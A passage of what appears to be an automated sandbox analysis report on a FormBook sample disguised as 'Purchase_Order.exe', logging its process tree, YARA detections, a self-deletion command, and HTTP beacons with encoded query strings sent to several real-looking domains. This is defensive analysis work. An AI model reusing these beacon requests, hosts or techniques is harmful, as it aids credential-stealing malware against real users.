                                                                          Data Raw: 39 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                          Data Ascii: 99<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.0</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          2192.168.2.749730162.241.253.6980C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jun 11, 2021 15:02:33.885598898 CEST1543OUTGET /uqf5/?7nBTylox=Da4K3sj86vB0DiXWDS0M3B9qaJwAtTAx24xw0Tll3v3x/H7Mq6Ed11VjNseOa8Aw4v8GgidMYQ==&x2J86x=b0DT HTTP/1.1
                                                                          Host: www.mexicobeachselfstorage.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jun 11, 2021 15:02:34.064239025 CEST1544INHTTP/1.1 404 Not Found
                                                                          Date: Fri, 11 Jun 2021 13:02:33 GMT
                                                                          Server: Apache
                                                                          Content-Length: 315
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          3192.168.2.74973634.102.136.18080C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jun 11, 2021 15:02:39.242866039 CEST1563OUTGET /uqf5/?7nBTylox=OWFfPnC7AN8R77spBBTPEjKTeS6t/Yq1T4r8C76EKqDZAgRBJ/M7pX2IcLDFGki/UVfODSOMWA==&x2J86x=b0DT HTTP/1.1
                                                                          Host: www.tylerrucarean.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jun 11, 2021 15:02:39.380528927 CEST1804INHTTP/1.1 403 Forbidden
                                                                          Server: openresty
                                                                          Date: Fri, 11 Jun 2021 13:02:39 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 275
                                                                          ETag: "60c03ab8-113"
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          4192.168.2.749737156.241.53.12780C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jun 11, 2021 15:02:44.697962046 CEST4589OUTGET /uqf5/?7nBTylox=G6aWL4dGCeTaDQvTN0iTmiC4rQ5Mm02kgONc9W0Ihpzmf26Z6y5bJWrOsZ7s6rQ8mSLn4IOSJg==&x2J86x=b0DT HTTP/1.1
                                                                          Host: www.cgjanvier.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jun 11, 2021 15:02:45.473994017 CEST4590INHTTP/1.1 302 Moved Temporarily
                                                                          Date: Fri, 11 Jun 2021 13:02:44 GMT
                                                                          Server: Apache
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          Pragma: no-cache
                                                                          Set-Cookie: PHPSESSID=j3m6f66rdeckaaj3j3b3fkf2p4; path=/
                                                                          Upgrade: h2
                                                                          Connection: Upgrade, close
                                                                          Location: /
                                                                          Content-Length: 0
                                                                          Content-Type: text/html; charset=gbk


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          5192.168.2.749738184.168.131.24180C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jun 11, 2021 15:02:50.500833035 CEST4592OUTGET /uqf5/?7nBTylox=kpO7L1Lkp8iY+ON3mW6Oq8CK0aWMRalGagQzJa0PwjziroypQJ68geE/Aoh82zgIKZtO8rNXLQ==&x2J86x=b0DT HTTP/1.1
                                                                          Host: www.flockuplabs.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jun 11, 2021 15:02:50.718878031 CEST4592INHTTP/1.1 301 Moved Permanently
                                                                          Server: nginx/1.16.1
                                                                          Date: Fri, 11 Jun 2021 13:02:50 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Location: https://flockuplabs.netlify.app/uqf5/?7nBTylox=kpO7L1Lkp8iY+ON3mW6Oq8CK0aWMRalGagQzJa0PwjziroypQJ68geE/Aoh82zgIKZtO8rNXLQ==&x2J86x=b0DT
                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          6192.168.2.749739104.21.64.21280C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jun 11, 2021 15:02:55.901098967 CEST4593OUTGET /uqf5/?7nBTylox=0mO7J7bxUTMGF+cl/VKrKxzRBdjnePXE0BEJzt+odUfuolHzSnSh7sdQNpsCsCcZdtFb7j3ZKA==&x2J86x=b0DT HTTP/1.1
                                                                          Host: www.culturalinterface.net
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jun 11, 2021 15:02:56.303220987 CEST4594INHTTP/1.1 403 forbidden
                                                                          Date: Fri, 11 Jun 2021 13:02:56 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          CF-Cache-Status: DYNAMIC
                                                                          cf-request-id: 0a9cc42fc10000c29525aa6000000001
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=jmGl9O6L%2B3wEM9OVAKoZuFUbBtUYOG6CrWGKf4JmH1L1C%2BfxSAkIpCbiI%2B1KFNya5NS4Pmg9NGI90JR8a5LE4JQyRErHT%2FqpGyTpWqq%2Bx%2Fd7RrOPqsAgJOeRVftjdSZTahvfYPwJBg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 65db095f9fc7c295-FRA
                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                          Data Raw: 64 0d 0a 34 30 33 20 46 4f 52 42 49 44 44 45 4e 0d 0a
                                                                          Data Ascii: d403 FORBIDDEN


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          7192.168.2.74974634.102.136.18080C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jun 11, 2021 15:03:01.424962997 CEST4874OUTGET /uqf5/?7nBTylox=pmtBAvifUG/ctnoihxxVo+fAjsCiy+wOZZJ542i91rLFt0/MLgCG4nudrW9V9JXQ/3W4T2ttkA==&x2J86x=b0DT HTTP/1.1
                                                                          Host: www.toolbnbapp.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jun 11, 2021 15:03:01.563910007 CEST4915INHTTP/1.1 403 Forbidden
                                                                          Server: openresty
                                                                          Date: Fri, 11 Jun 2021 13:03:01 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 275
                                                                          ETag: "60ba413e-113"
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          8192.168.2.74975245.140.167.16180C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jun 11, 2021 15:03:06.762137890 CEST5490OUTGET /uqf5/?7nBTylox=kfF6JYR62xx/HO09iSVcnhFTUCCMKaRIkXBWym1Qtkj7XLCdUz5OHH2iCIaFDs/mVibljY8vwA==&x2J86x=b0DT HTTP/1.1
                                                                          Host: www.trainup-wall.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jun 11, 2021 15:03:06.846755028 CEST5490INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.18.0
                                                                          Date: Fri, 11 Jun 2021 13:03:06 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Data Raw: 39 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 99<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0</center></body></html>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          9192.168.2.749753160.16.235.3780C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jun 11, 2021 15:03:12.500335932 CEST5495OUTGET /uqf5/?7nBTylox=bDjqt1XeIDnHqlCDx4UVtMOGyZAgv2iIcL7KLwBfVGeKSjMBDNU7E4Z2+8mD2QoqovVkCTqMJw==&x2J86x=b0DT HTTP/1.1
                                                                          Host: www.paolograssino.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jun 11, 2021 15:03:13.179290056 CEST5497INHTTP/1.1 403 Forbidden
                                                                          Server: nginx/1.20.0
                                                                          Date: Fri, 11 Jun 2021 13:03:13 GMT
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Content-Length: 13
                                                                          Connection: close
                                                                          X-XSS-Protection: 1; mode=block
                                                                          X-Content-Type-Options: nosniff
                                                                          Data Raw: 34 30 33 20 46 6f 72 62 69 64 64 65 6e
                                                                          Data Ascii: 403 Forbidden


                                                                          Code Manipulations

                                                                          Statistics

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          Analysis Process: Purchase_Order.exe PID: 1528 Parent PID: 5804

                                                                          General

                                                                          Start time:15:01:12
                                                                          Start date:11/06/2021
                                                                          Path:C:\Users\user\Desktop\Purchase_Order.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'C:\Users\user\Desktop\Purchase_Order.exe'
                                                                          Imagebase:0x4f0000
                                                                          File size:1532416 bytes
                                                                          MD5 hash:4AA8159742BECD97F9ECDDA33798B065
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:low

                                                                          Analysis Process: RegSvcs.exe PID: 3608 Parent PID: 1528

                                                                          General

                                                                          Start time:15:01:23
                                                                          Start date:11/06/2021
                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          Imagebase:0x860000
                                                                          File size:45152 bytes
                                                                          MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.320741403.0000000001210000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.320741403.0000000001210000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.320741403.0000000001210000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.321348253.0000000001580000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.321348253.0000000001580000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.321348253.0000000001580000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.257791048.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.257791048.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.257791048.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.320281190.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.320281190.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.320281190.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:high

                                                                          Analysis Process: explorer.exe PID: 3292 Parent PID: 3608

                                                                          General

                                                                          Start time:15:01:26
                                                                          Start date:11/06/2021
                                                                          Path:C:\Windows\explorer.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:
                                                                          Imagebase:0x7ff662bf0000
                                                                          File size:3933184 bytes
                                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          Analysis Process: systray.exe PID: 1752 Parent PID: 3292

                                                                          General

                                                                          Start time:15:01:49
                                                                          Start date:11/06/2021
                                                                          Path:C:\Windows\SysWOW64\systray.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\systray.exe
                                                                          Imagebase:0x13b0000
                                                                          File size:9728 bytes
                                                                          MD5 hash:1373D481BE4C8A6E5F5030D2FB0A0C68
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.504805498.0000000004D80000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.504805498.0000000004D80000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.504805498.0000000004D80000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.501363256.00000000010C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.501363256.00000000010C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.501363256.00000000010C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.505034491.0000000004DB0000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.505034491.0000000004DB0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.505034491.0000000004DB0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:moderate

                                                                          Analysis Process: cmd.exe PID: 1200 Parent PID: 1752

                                                                          General

                                                                          Start time:15:01:54
                                                                          Start date:11/06/2021
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
                                                                          Imagebase:0x230000
                                                                          File size:232960 bytes
                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          Analysis Process: conhost.exe PID: 5552 Parent PID: 1200

                                                                          General

                                                                          Start time:15:01:54
                                                                          Start date:11/06/2021
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff774ee0000
                                                                          File size:625664 bytes
                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          Disassembly

                                                                          Code Analysis

                                                                          Reset < >